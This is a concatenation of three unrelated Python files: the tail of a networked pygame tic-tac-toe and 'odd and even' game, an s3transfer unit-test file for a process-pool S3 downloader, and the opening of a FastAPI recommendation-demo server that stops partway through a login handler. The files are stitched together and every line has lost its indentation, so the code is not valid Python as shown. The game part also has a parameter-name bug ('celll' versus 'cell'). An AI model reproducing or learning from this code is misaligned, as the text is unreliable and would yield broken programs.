#game logic for X and O
def tradiGame():
global turn, tradiCurrPlayer, gridTradi, score1, score2, row, col, playing, turn, btnText
if turn and playing:
x, y = pygame.mouse.get_pos()
if x > 585 and x <= 975 and y > 35 and y <= 415:
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("Wait for your turn!", True, RED), (60, 525))
if x > 585 and x <= 715:
col = 1
x=615
elif x > 715 and x <= 850:
col = 2
x=745
elif x > 850 and x <= 975:
col = 3
x=890
if y > 35 and y <= 155:
row = 1
y=55
elif y > 155 and y <= 300:
row = 2
y=185
elif y > 300 and y <= 415:
row = 3
y=320
#sends information about the move to the other user
sendData= '{}-{}-{}'.format(int(x),int(y),playing).encode()
sock.send(sendData)
if tradiCheckWin() is False:
if x > 585 and x <= 975 and y > 35 and y <= 415:
if gridTradi[row-1][col-1] == None:
gridTradi[row-1][col-1] = tradiCurrPlayer
tradiDrawOX(row, col)
if tradiCheckWin():
playing=False
if tradiCurrPlayer == 'x':
score2 += 1
else:
score1 += 1
turn=False
#---------------------------------------------
#| FOR Odd and Even GAME |
#---------------------------------------------
#for drawing number images
def numDraw(celll):
global numOfImg
codX = 0
codY = 0
if cell == 1:
codX= 614
codY = 50
if cell == 2:
codX= 744
codY = 50
if cell == 3:
codX= 879
codY = 50
if cell == 4:
codX= 614
codY = 185
if cell == 5:
codX= 744
codY = 185
if cell == 6:
codX= 879
codY = 185
if cell == 7:
codX= 614
codY = 320
if cell == 8:
codX= 744
codY = 320
if cell == 9:
codX= 879
codY = 320
imgNum = pygame.image.load('assets\\' + str(numOfImg) + ".png")
imgNum = pygame.transform.scale(imgNum, (80,80))
screen.blit(imgNum, (codX, codY))
#if a row, column, or diagonal line has the sum of 15, a winning line will be drawn and sent to the other user
def numCheckWin():
global turn, playing
win = False
if (gridNum[0]+ gridNum[1]+ gridNum[2]==15 and gridNum[0] != 0 and gridNum[1] != 0 and gridNum[2] != 0):
screen.blit(imgWinHon, (583, 90))
playing=False
sendData= '{}-{}-{}-{}'.format(583,90,1.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
if (gridNum[3]+ gridNum[4]+ gridNum[5]==15 and gridNum[3] != 0 and gridNum[4] != 0 and gridNum[5] != 0):
screen.blit(imgWinHon, (583, 222))
playing=False
sendData= '{}-{}-{}-{}'.format(583,222,1.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
if (gridNum[6]+ gridNum[7]+ gridNum[8]==15 and gridNum[6] != 0 and gridNum[7] != 0 and gridNum[8] != 0):
screen.blit(imgWinHon, (583, 354))
playing=False
sendData= '{}-{}-{}-{}'.format(583,354,1.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
if (gridNum[0]+ gridNum[3]+ gridNum[6]==15 and gridNum[0] != 0 and gridNum[3] != 0 and gridNum[6] != 0):
screen.blit(imgWinVer, (645, 27))
playing=False
sendData= '{}-{}-{}-{}'.format(645,27,2.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
if (gridNum[1] +gridNum[4]+ gridNum[7]==15 and gridNum[1] != 0 and gridNum[4] != 0 and gridNum[7] != 0):
screen.blit(imgWinVer, (775, 27))
playing=False
sendData= '{}-{}-{}-{}'.format(775,27,2.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
if (gridNum[2]+ gridNum[5]+ gridNum[8]==15 and gridNum[2] != 0 and gridNum[5] != 0 and gridNum[8] != 0):
screen.blit(imgWinVer, (910, 27))
playing=False
sendData= '{}-{}-{}-{}'.format(910,27,2.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
if (gridNum[0]+ gridNum[4]+ gridNum[8]==15 and gridNum[0] != 0 and gridNum[4] != 0 and gridNum[8] != 0):
screen.blit(imgWinTopLeft, (587, 34))
playing=False
sendData= '{}-{}-{}-{}'.format(587,34,3.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
if (gridNum[2]+ gridNum[4]+ gridNum[6]==15 and gridNum[2] != 0 and gridNum[4] != 0 and gridNum[6] != 0):
screen.blit(imgWinTopRight, (587, 34))
playing=False
sendData= '{}-{}-{}-{}'.format(587,34,4.0,playing).encode()
sock.send(sendData)
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("You win!", True, RED), (60, 525))
turn=False
win = True
return win
#game logic for odd and even
def numGame():
global numOfImg, gridNum, score1, score2, cell, playing, turn
if turn and playing:
# get coordinates of mouse click
x, y = pygame.mouse.get_pos()
if x > 585 and x <= 975 and y > 35 and y <= 415:
#turn status output
background = pygame.Rect(55, 525, 375, 75)
pygame.draw.rect(screen, BLACK, background)
screen.blit(btnText.render("Wait for your turn!", True, RED), (60, 525))
if x > 585 and x < 715 and y > 35 and y < 155:
cell = 1
x=615
y=55
elif x > 715 and x <= 850 and y > 35 and y <= 155:
cell = 2
x=745
y=55
elif x > 850 and x <= 975 and y > 35 and y <= 155:
cell = 3
x=890
y=55
elif x > 585 and x <= 715 and y > 155 and y <= 300:
cell = 4
x=615
y=185
elif x > 715 and x <= 850 and y > 155 and y <= 300:
cell = 5
x=745
y=185
elif x > 850 and x <= 975 and y > 155 and y <= 300:
cell = 6
x=890
y=185
elif x > 585 and x <= 715 and y > 300 and y <= 415:
cell = 7
x=615
y=320
elif x > 715 and x <= 850 and y > 300 and y <= 415:
cell = 8
x=745
y=320
elif x > 850 and x <= 975 and y > 300 and y <= 415:
cell = 9
x=890
y=320
if numCheckWin() is False:
if x > 585 and x <= 975 and y > 35 and y <= 415:
if gridNum[cell-1] < 1 and numOfImg <= 9:
gridNum[cell-1] = numOfImg
numDraw(cell)
#sends information about the move to the other user
sendData= '{}-{}-{}'.format(x,y,playing).encode()
sock.send(sendData)
numOfImg += 1
if numCheckWin():
playing=False
if numOfImg % 2:
score1 += 1
else:
score2 += 1
#for running the buttons and runs the right type of selected game option
def gameClicks():
global gameOption
againBtn()
newBtn()
resetBtn()
if gameOption == 1:
tradiGame()
elif gameOption == 2:
numGame()
#for running the game
running = True
#while loop for running Pygame
while running:
pygame.init()
gamePage()
#if mouse click event happens in the active co-ordinate, the game runs
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
playing = False
elif event.type == pygame.MOUSEBUTTONDOWN:
setGameAndPlayerOptions()
gameClicks()
pygame.display.update()
pygame.quit()
|
test_processpool.py
|
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import os
import signal
import time
import threading
import mock
from six.moves import queue
from botocore.exceptions import ClientError
from botocore.exceptions import ReadTimeoutError
from botocore.client import BaseClient
from botocore.config import Config
from tests import unittest
from tests import skip_if_windows
from tests import FileCreator
from tests import StreamWithError
from tests import StubbedClientTest
from s3transfer.compat import six
from s3transfer.constants import PROCESS_USER_AGENT
from s3transfer.exceptions import RetriesExceededError
from s3transfer.exceptions import CancelledError
from s3transfer.utils import OSUtils
from s3transfer.utils import CallArgs
from s3transfer.processpool import SHUTDOWN_SIGNAL
from s3transfer.processpool import ignore_ctrl_c
from s3transfer.processpool import DownloadFileRequest
from s3transfer.processpool import GetObjectJob
from s3transfer.processpool import ProcessTransferConfig
from s3transfer.processpool import ProcessPoolDownloader
from s3transfer.processpool import ProcessPoolTransferFuture
from s3transfer.processpool import ProcessPoolTransferMeta
from s3transfer.processpool import TransferMonitor
from s3transfer.processpool import TransferState
from s3transfer.processpool import ClientFactory
from s3transfer.processpool import GetObjectSubmitter
from s3transfer.processpool import GetObjectWorker
class RenameFailingOSUtils(OSUtils):
def __init__(self, exception):
self.exception = exception
def rename_file(self, current_filename, new_filename):
raise self.exception
class TestIgnoreCtrlC(unittest.TestCase):
@skip_if_windows('os.kill() with SIGINT not supported on Windows')
def test_ignore_ctrl_c(self):
with ignore_ctrl_c():
try:
os.kill(os.getpid(), signal.SIGINT)
except KeyboardInterrupt:
self.fail('The ignore_ctrl_c context manager should have '
'ignored the KeyboardInterrupt exception')
class TestProcessPoolDownloader(unittest.TestCase):
def test_uses_client_kwargs(self):
with mock.patch('s3transfer.processpool.ClientFactory') as factory:
ProcessPoolDownloader(client_kwargs={'region_name': 'myregion'})
self.assertEqual(
factory.call_args[0][0], {'region_name': 'myregion'})
class TestProcessPoolTransferFuture(unittest.TestCase):
def setUp(self):
self.monitor = TransferMonitor()
self.transfer_id = self.monitor.notify_new_transfer()
self.meta = ProcessPoolTransferMeta(
transfer_id=self.transfer_id, call_args=CallArgs())
self.future = ProcessPoolTransferFuture(
monitor=self.monitor, meta=self.meta)
def test_meta(self):
self.assertEqual(self.future.meta, self.meta)
def test_done(self):
self.assertFalse(self.future.done())
self.monitor.notify_done(self.transfer_id)
self.assertTrue(self.future.done())
def test_result(self):
self.monitor.notify_done(self.transfer_id)
self.assertIsNone(self.future.result())
def test_result_with_exception(self):
self.monitor.notify_exception(self.transfer_id, RuntimeError())
self.monitor.notify_done(self.transfer_id)
with self.assertRaises(RuntimeError):
self.future.result()
def test_result_with_keyboard_interrupt(self):
mock_monitor = mock.Mock(TransferMonitor)
mock_monitor._connect = mock.Mock()
mock_monitor.poll_for_result.side_effect = KeyboardInterrupt()
future = ProcessPoolTransferFuture(
monitor=mock_monitor, meta=self.meta)
with self.assertRaises(KeyboardInterrupt):
future.result()
self.assertTrue(mock_monitor._connect.called)
self.assertTrue(mock_monitor.notify_exception.called)
call_args = mock_monitor.notify_exception.call_args[0]
self.assertEqual(call_args[0], self.transfer_id)
self.assertIsInstance(call_args[1], CancelledError)
def test_cancel(self):
self.future.cancel()
self.monitor.notify_done(self.transfer_id)
with self.assertRaises(CancelledError):
self.future.result()
class TestProcessPoolTransferMeta(unittest.TestCase):
def test_transfer_id(self):
meta = ProcessPoolTransferMeta(1, CallArgs())
self.assertEqual(meta.transfer_id, 1)
def test_call_args(self):
call_args = CallArgs()
meta = ProcessPoolTransferMeta(1, call_args)
self.assertEqual(meta.call_args, call_args)
def test_user_context(self):
meta = ProcessPoolTransferMeta(1, CallArgs())
self.assertEqual(meta.user_context, {})
meta.user_context['mykey'] = 'myvalue'
self.assertEqual(meta.user_context, {'mykey': 'myvalue'})
class TestClientFactory(unittest.TestCase):
def test_create_client(self):
client = ClientFactory().create_client()
self.assertIsInstance(client, BaseClient)
self.assertEqual(client.meta.service_model.service_name, 's3')
self.assertIn(PROCESS_USER_AGENT, client.meta.config.user_agent)
def test_create_client_with_client_kwargs(self):
client = ClientFactory({'region_name': 'myregion'}).create_client()
self.assertEqual(client.meta.region_name, 'myregion')
def test_user_agent_with_config(self):
client = ClientFactory({'config': Config()}).create_client()
self.assertIn(PROCESS_USER_AGENT, client.meta.config.user_agent)
def test_user_agent_with_existing_user_agent_extra(self):
config = Config(user_agent_extra='foo/1.0')
client = ClientFactory({'config': config}).create_client()
self.assertIn(PROCESS_USER_AGENT, client.meta.config.user_agent)
def test_user_agent_with_existing_user_agent(self):
config = Config(user_agent='foo/1.0')
client = ClientFactory({'config': config}).create_client()
self.assertIn(PROCESS_USER_AGENT, client.meta.config.user_agent)
class TestTransferMonitor(unittest.TestCase):
def setUp(self):
self.monitor = TransferMonitor()
self.transfer_id = self.monitor.notify_new_transfer()
def test_notify_new_transfer_creates_new_state(self):
monitor = TransferMonitor()
transfer_id = monitor.notify_new_transfer()
self.assertFalse(monitor.is_done(transfer_id))
self.assertIsNone(monitor.get_exception(transfer_id))
def test_notify_new_transfer_increments_transfer_id(self):
monitor = TransferMonitor()
self.assertEqual(monitor.notify_new_transfer(), 0)
self.assertEqual(monitor.notify_new_transfer(), 1)
def test_notify_get_exception(self):
exception = Exception()
self.monitor.notify_exception(self.transfer_id, exception)
self.assertEqual(
self.monitor.get_exception(self.transfer_id), exception)
def test_get_no_exception(self):
self.assertIsNone(self.monitor.get_exception(self.transfer_id))
def test_notify_jobs(self):
self.monitor.notify_expected_jobs_to_complete(self.transfer_id, 2)
self.assertEqual(self.monitor.notify_job_complete(self.transfer_id), 1)
self.assertEqual(self.monitor.notify_job_complete(self.transfer_id), 0)
def test_notify_jobs_for_multiple_transfers(self):
self.monitor.notify_expected_jobs_to_complete(self.transfer_id, 2)
other_transfer_id = self.monitor.notify_new_transfer()
self.monitor.notify_expected_jobs_to_complete(other_transfer_id, 2)
self.assertEqual(self.monitor.notify_job_complete(self.transfer_id), 1)
self.assertEqual(
self.monitor.notify_job_complete(other_transfer_id), 1)
def test_done(self):
self.assertFalse(self.monitor.is_done(self.transfer_id))
self.monitor.notify_done(self.transfer_id)
self.assertTrue(self.monitor.is_done(self.transfer_id))
def test_poll_for_result(self):
self.monitor.notify_done(self.transfer_id)
self.assertIsNone(self.monitor.poll_for_result(self.transfer_id))
def test_poll_for_result_raises_error(self):
self.monitor.notify_exception(self.transfer_id, RuntimeError())
self.monitor.notify_done(self.transfer_id)
with self.assertRaises(RuntimeError):
self.monitor.poll_for_result(self.transfer_id)
def test_poll_for_result_waits_till_done(self):
event_order = []
def sleep_then_notify_done():
time.sleep(0.05)
event_order.append('notify_done')
self.monitor.notify_done(self.transfer_id)
t = threading.Thread(target=sleep_then_notify_done)
t.start()
self.monitor.poll_for_result(self.transfer_id)
event_order.append('done_polling')
self.assertEqual(event_order, ['notify_done', 'done_polling'])
def test_notify_cancel_all_in_progress(self):
monitor = TransferMonitor()
transfer_ids = []
for _ in range(10):
transfer_ids.append(monitor.notify_new_transfer())
monitor.notify_cancel_all_in_progress()
for transfer_id in transfer_ids:
self.assertIsInstance(
monitor.get_exception(transfer_id), CancelledError)
# Cancelling a transfer does not mean it is done as there may
# be cleanup work left to do.
self.assertFalse(monitor.is_done(transfer_id))
def test_notify_cancel_does_not_affect_done_transfers(self):
self.monitor.notify_done(self.transfer_id)
self.monitor.notify_cancel_all_in_progress()
self.assertTrue(self.monitor.is_done(self.transfer_id))
self.assertIsNone(self.monitor.get_exception(self.transfer_id))
class TestTransferState(unittest.TestCase):
def setUp(self):
self.state = TransferState()
def test_done(self):
self.assertFalse(self.state.done)
self.state.set_done()
self.assertTrue(self.state.done)
def test_waits_till_done_is_set(self):
event_order = []
def sleep_then_set_done():
time.sleep(0.05)
event_order.append('set_done')
self.state.set_done()
t = threading.Thread(target=sleep_then_set_done)
t.start()
self.state.wait_till_done()
event_order.append('done_waiting')
self.assertEqual(event_order, ['set_done', 'done_waiting'])
def test_exception(self):
exception = RuntimeError()
self.state.exception = exception
self.assertEqual(self.state.exception, exception)
def test_jobs_to_complete(self):
self.state.jobs_to_complete = 5
self.assertEqual(self.state.jobs_to_complete, 5)
def test_decrement_jobs_to_complete(self):
self.state.jobs_to_complete = 5
self.assertEqual(self.state.decrement_jobs_to_complete(), 4)
class TestGetObjectSubmitter(StubbedClientTest):
def setUp(self):
super(TestGetObjectSubmitter, self).setUp()
self.transfer_config = ProcessTransferConfig()
self.client_factory = mock.Mock(ClientFactory)
self.client_factory.create_client.return_value = self.client
self.transfer_monitor = TransferMonitor()
self.osutil = mock.Mock(OSUtils)
self.download_request_queue = queue.Queue()
self.worker_queue = queue.Queue()
self.submitter = GetObjectSubmitter(
transfer_config=self.transfer_config,
client_factory=self.client_factory,
transfer_monitor=self.transfer_monitor,
osutil=self.osutil,
download_request_queue=self.download_request_queue,
worker_queue=self.worker_queue,
)
self.transfer_id = self.transfer_monitor.notify_new_transfer()
self.bucket = 'bucket'
self.key = 'key'
self.filename = 'myfile'
self.temp_filename = 'myfile.temp'
self.osutil.get_temp_filename.return_value = self.temp_filename
self.extra_args = {}
self.expected_size = None
def add_download_file_request(self, **override_kwargs):
kwargs = {
'transfer_id': self.transfer_id,
'bucket': self.bucket,
'key': self.key,
'filename': self.filename,
'extra_args': self.extra_args,
'expected_size': self.expected_size
}
kwargs.update(override_kwargs)
self.download_request_queue.put(DownloadFileRequest(**kwargs))
def add_shutdown(self):
self.download_request_queue.put(SHUTDOWN_SIGNAL)
def assert_submitted_get_object_jobs(self, expected_jobs):
actual_jobs = []
while not self.worker_queue.empty():
actual_jobs.append(self.worker_queue.get())
self.assertEqual(actual_jobs, expected_jobs)
def test_run_for_non_ranged_download(self):
self.add_download_file_request(expected_size=1)
self.add_shutdown()
self.submitter.run()
self.osutil.allocate.assert_called_with(self.temp_filename, 1)
self.assert_submitted_get_object_jobs([
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=0,
extra_args={},
filename=self.filename,
)
])
def test_run_for_ranged_download(self):
self.transfer_config.multipart_chunksize = 2
self.transfer_config.multipart_threshold = 4
self.add_download_file_request(expected_size=4)
self.add_shutdown()
self.submitter.run()
self.osutil.allocate.assert_called_with(self.temp_filename, 4)
self.assert_submitted_get_object_jobs([
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=0,
extra_args={'Range': 'bytes=0-1'},
filename=self.filename,
),
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=2,
extra_args={'Range': 'bytes=2-'},
filename=self.filename,
),
])
def test_run_when_expected_size_not_provided(self):
self.stubber.add_response(
'head_object', {'ContentLength': 1},
expected_params={
'Bucket': self.bucket,
'Key': self.key
}
)
self.add_download_file_request(expected_size=None)
self.add_shutdown()
self.submitter.run()
self.stubber.assert_no_pending_responses()
self.osutil.allocate.assert_called_with(self.temp_filename, 1)
self.assert_submitted_get_object_jobs([
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=0,
extra_args={},
filename=self.filename,
)
])
def test_run_with_extra_args(self):
self.stubber.add_response(
'head_object', {'ContentLength': 1},
expected_params={
'Bucket': self.bucket,
'Key': self.key,
'VersionId': 'versionid'
}
)
self.add_download_file_request(
extra_args={'VersionId': 'versionid'},
expected_size=None
)
self.add_shutdown()
self.submitter.run()
self.stubber.assert_no_pending_responses()
self.osutil.allocate.assert_called_with(self.temp_filename, 1)
self.assert_submitted_get_object_jobs([
GetObjectJob(
transfer_id=self.transfer_id,
bucket=self.bucket,
key=self.key,
temp_filename=self.temp_filename,
offset=0,
extra_args={'VersionId': 'versionid'},
filename=self.filename,
)
])
def test_run_with_exception(self):
self.stubber.add_client_error('head_object', 'NoSuchKey', 404)
self.add_download_file_request(expected_size=None)
self.add_shutdown()
self.submitter.run()
self.stubber.assert_no_pending_responses()
self.assert_submitted_get_object_jobs([])
self.assertIsInstance(
self.transfer_monitor.get_exception(self.transfer_id), ClientError)
def test_run_with_error_in_allocating_temp_file(self):
self.osutil.allocate.side_effect = OSError()
self.add_download_file_request(expected_size=1)
self.add_shutdown()
self.submitter.run()
self.assert_submitted_get_object_jobs([])
self.assertIsInstance(
self.transfer_monitor.get_exception(self.transfer_id), OSError)
@skip_if_windows('os.kill() with SIGINT not supported on Windows')
def test_submitter_cannot_be_killed(self):
self.add_download_file_request(expected_size=None)
self.add_shutdown()
def raise_ctrl_c(**kwargs):
os.kill(os.getpid(), signal.SIGINT)
mock_client = mock.Mock()
mock_client.head_object = raise_ctrl_c
self.client_factory.create_client.return_value = mock_client
try:
self.submitter.run()
except KeyboardInterrupt:
self.fail(
'The submitter should have not been killed by the '
'KeyboardInterrupt'
)
class TestGetObjectWorker(StubbedClientTest):
def setUp(self):
super(TestGetObjectWorker, self).setUp()
self.files = FileCreator()
self.queue = queue.Queue()
self.client_factory = mock.Mock(ClientFactory)
self.client_factory.create_client.return_value = self.client
self.transfer_monitor = TransferMonitor()
self.osutil = OSUtils()
self.worker = GetObjectWorker(
queue=self.queue,
client_factory=self.client_factory,
transfer_monitor=self.transfer_monitor,
osutil=self.osutil
)
self.transfer_id = self.transfer_monitor.notify_new_transfer()
self.bucket = 'bucket'
self.key = 'key'
self.remote_contents = b'my content'
self.temp_filename = self.files.create_file('tempfile', '')
self.extra_args = {}
self.offset = 0
self.final_filename = self.files.full_path('final_filename')
self.stream = six.BytesIO(self.remote_contents)
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1000)
def tearDown(self):
super(TestGetObjectWorker, self).tearDown()
self.files.remove_all()
def add_get_object_job(self, **override_kwargs):
kwargs = {
'transfer_id': self.transfer_id,
'bucket': self.bucket,
'key': self.key,
'temp_filename': self.temp_filename,
'extra_args': self.extra_args,
'offset': self.offset,
'filename': self.final_filename
}
kwargs.update(override_kwargs)
self.queue.put(GetObjectJob(**kwargs))
def add_shutdown(self):
self.queue.put(SHUTDOWN_SIGNAL)
def add_stubbed_get_object_response(self, body=None, expected_params=None):
if body is None:
body = self.stream
get_object_response = {'Body': body}
if expected_params is None:
expected_params = {
'Bucket': self.bucket,
'Key': self.key
}
self.stubber.add_response(
'get_object', get_object_response, expected_params)
def assert_contents(self, filename, contents):
self.assertTrue(os.path.exists(filename))
with open(filename, 'rb') as f:
self.assertEqual(f.read(), contents)
def assert_does_not_exist(self, filename):
self.assertFalse(os.path.exists(filename))
def test_run_is_final_job(self):
self.add_get_object_job()
self.add_shutdown()
self.add_stubbed_get_object_response()
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1)
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assert_does_not_exist(self.temp_filename)
self.assert_contents(self.final_filename, self.remote_contents)
def test_run_jobs_is_not_final_job(self):
self.add_get_object_job()
self.add_shutdown()
self.add_stubbed_get_object_response()
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1000)
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assert_contents(self.temp_filename, self.remote_contents)
self.assert_does_not_exist(self.final_filename)
def test_run_with_extra_args(self):
self.add_get_object_job(extra_args={'VersionId': 'versionid'})
self.add_shutdown()
self.add_stubbed_get_object_response(
expected_params={
'Bucket': self.bucket,
'Key': self.key,
'VersionId': 'versionid'
}
)
self.worker.run()
self.stubber.assert_no_pending_responses()
def test_run_with_offset(self):
offset = 1
self.add_get_object_job(offset=offset)
self.add_shutdown()
self.add_stubbed_get_object_response()
self.worker.run()
with open(self.temp_filename, 'rb') as f:
f.seek(offset)
self.assertEqual(f.read(), self.remote_contents)
def test_run_error_in_get_object(self):
self.add_get_object_job()
self.add_shutdown()
self.stubber.add_client_error('get_object', 'NoSuchKey', 404)
self.add_stubbed_get_object_response()
self.worker.run()
self.assertIsInstance(
self.transfer_monitor.get_exception(self.transfer_id), ClientError)
def test_run_does_retries_for_get_object(self):
self.add_get_object_job()
self.add_shutdown()
self.add_stubbed_get_object_response(
body=StreamWithError(
self.stream, ReadTimeoutError(endpoint_url='')))
self.add_stubbed_get_object_response()
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assert_contents(self.temp_filename, self.remote_contents)
def test_run_can_exhaust_retries_for_get_object(self):
self.add_get_object_job()
self.add_shutdown()
# 5 is the current setting for max number of GetObject attempts
for _ in range(5):
self.add_stubbed_get_object_response(
body=StreamWithError(
self.stream, ReadTimeoutError(endpoint_url='')))
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assertIsInstance(
self.transfer_monitor.get_exception(self.transfer_id),
RetriesExceededError
)
def test_run_skips_get_object_on_previous_exception(self):
self.add_get_object_job()
self.add_shutdown()
self.transfer_monitor.notify_exception(self.transfer_id, Exception())
self.worker.run()
# Note we did not add a stubbed response for get_object
self.stubber.assert_no_pending_responses()
def test_run_final_job_removes_file_on_previous_exception(self):
self.add_get_object_job()
self.add_shutdown()
self.transfer_monitor.notify_exception(self.transfer_id, Exception())
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1)
self.worker.run()
self.stubber.assert_no_pending_responses()
self.assert_does_not_exist(self.temp_filename)
self.assert_does_not_exist(self.final_filename)
def test_run_fails_to_rename_file(self):
exception = OSError()
osutil = RenameFailingOSUtils(exception)
self.worker = GetObjectWorker(
queue=self.queue,
client_factory=self.client_factory,
transfer_monitor=self.transfer_monitor,
osutil=osutil
)
self.add_get_object_job()
self.add_shutdown()
self.add_stubbed_get_object_response()
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1)
self.worker.run()
self.assertEqual(
self.transfer_monitor.get_exception(self.transfer_id), exception)
self.assert_does_not_exist(self.temp_filename)
self.assert_does_not_exist(self.final_filename)
@skip_if_windows('os.kill() with SIGINT not supported on Windows')
def test_worker_cannot_be_killed(self):
self.add_get_object_job()
self.add_shutdown()
self.transfer_monitor.notify_expected_jobs_to_complete(
self.transfer_id, 1)
def raise_ctrl_c(**kwargs):
os.kill(os.getpid(), signal.SIGINT)
mock_client = mock.Mock()
mock_client.get_object = raise_ctrl_c
self.client_factory.create_client.return_value = mock_client
try:
self.worker.run()
except KeyboardInterrupt:
self.fail(
'The worker should have not been killed by the '
'KeyboardInterrupt'
)
|
server.py
|
import json
import logging
import os
import uuid
from typing import List
import sys
import cache
import math
import base64
from random import randint
from multiprocessing import Process, Pool
from threading import Thread
import boto3
import botocore
import requests
import uvicorn as uvicorn
from fastapi import FastAPI, Header, HTTPException, APIRouter, Depends
from fastapi.exceptions import RequestValidationError
from pydantic import BaseModel
import random
import calendar
import time
from bs4 import BeautifulSoup
from functools import partial, total_ordering
from requests import ConnectTimeout
from typing import Optional
from fastapi.responses import JSONResponse
class LoginRequest(BaseModel):
userId: str
userName: Optional[str] = None
class TrainRequest(BaseModel):
change_type: str
class URLRequest(BaseModel):
title: str
class ClickRequest(BaseModel):
userId: str
itemId: str
class LoadMessage(BaseModel):
file_type: str
file_path: str
file_name: list = []
class LoadRequest(BaseModel):
message: LoadMessage = None
app = FastAPI()
MANDATORY_ENV_VARS = {
'DEMO_PORT': 5900,
'REDIS_HOST': 'localhost',
'REDIS_PORT': 6379,
'EVENT_SERVICE_ENDPOINT': 'http://event:5100',
'RETRIEVE_SERVICE_ENDPOINT': 'http://retrieve:5600',
'LOCAL_DATA_FOLDER': '/tmp/rs-data/',
'S3_BUCKET': 'aws-gcr-rs-sol-demo-ap-southeast-1-522244679887',
'S3_PREFIX': 'sample-data',
'AWS_REGION': 'ap-southeast-1',
'CLICK_RECORD_BUCKET': 'gcr-rs-ops-ap-southeast-1-522244679887',
'CLICK_RECORD_FILE_PATH': 'system/ingest-data/action/',
'USER_RECORD_FILE_PATH': 'system/ingest-data/user/',
'TEST': ''
}
REDIS_KEY_USER_ID_CLICK_DICT = 'user_id_click_dict'
REDIS_KEY_USER_LOGIN_DICT = 'user_login_dict'
TRIGGER_RECALL_WINDOW = 3
news_records_dict = 'news_records_dict'
movie_records_dict = 'movie_records_dict'
user_id_action_dict = 'user_id_action_dict'
lNewsCfgCompleteType = ['news_story', 'news_culture', 'news_entertainment', 'news_sports', 'news_finance', 'news_house',
'news_car', 'news_edu', 'news_tech', 'news_military', 'news_travel', 'news_world', 'news_agriculture', 'news_game']
def xasync(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
@app.get('/api/v1/demo/dashboard', tags=["demo"])
def get_dashboard_data():
logging.info('Start demo->get_dashboard_data()...')
s3_bucket = MANDATORY_ENV_VARS['S3_BUCKET']
s3_prefix = MANDATORY_ENV_VARS['S3_PREFIX']
file_name = 'system/dashboard/dashboard.json'
file_key = os.path.join(s3_prefix, file_name)
s3 = boto3.resource('s3')
object_str = s3.Object(s3_bucket, file_key).get()[
'Body'].read().decode('utf-8')
json_data = json.loads(object_str)
return response_success(json_data)
# notice demo service to load news record data
@app.post('/api/v1/demo/notice', tags=["demo"])
def notice(loadRequest: LoadRequest):
logging.info('Start demo->notice()...')
loader_message = loadRequest.message
file_type = loader_message.file_type
file_path = loader_message.file_path
file_list = loader_message.file_name
logging.info('file type:{}, file_path:{}, file_list:{}'.format(
file_type, file_path, file_list))
if not os.path.exists(MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER']):
logging.info("the local path {} is not existed".format(MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER']))
os.mkdir(MANDATORY_ENV_VARS['LOCAL_DATA_FOLDER'])
if file_type == 'news_records':
for file in file_list:
init_news_records_data(file_type, file_path, file, news_records_dict)
elif file_type == 'movie_records':
for file in file_list:
init_movie_records_data(file_type, file_path, file, movie_records_dict)
return json.dumps({'result': 'success'}), 200, {'ContentType': 'application/json'}
@app.post('/api/v1/demo/login', tags=["demo"])
def login(loginRequest: LoginRequest):
logging.info('Start demo->login()...')
user_id = loginRequest.userId
user_name = loginRequest.userName
if user_name == None:
s3_body = ''
